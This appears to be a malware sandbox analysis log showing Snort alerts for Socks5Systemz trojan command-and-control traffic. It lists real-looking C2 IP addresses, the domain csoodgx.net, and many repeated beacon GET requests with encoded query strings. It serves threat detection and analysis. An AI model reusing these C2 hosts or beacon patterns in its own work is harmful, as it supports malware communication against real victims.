Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49778 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49779 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49780 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49781 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49782 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49783 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49784 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49785 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49786 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49787 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49788 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49789 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49790 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49791 -> 45.142.214.240:80
Source: Traffic | Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49792 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49793 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49794 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49795 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49796 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49797 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49798 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49799 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49800 -> 45.142.214.240:80
        Source: global traffic | TCP traffic: 192.168.2.5:49714 -> 89.105.201.183:2023
        Source: Joe Sandbox View | IP Address: 45.142.214.240
        Source: Joe Sandbox View | ASN Name: ALEXHOSTMD
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1Host: csoodgx.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
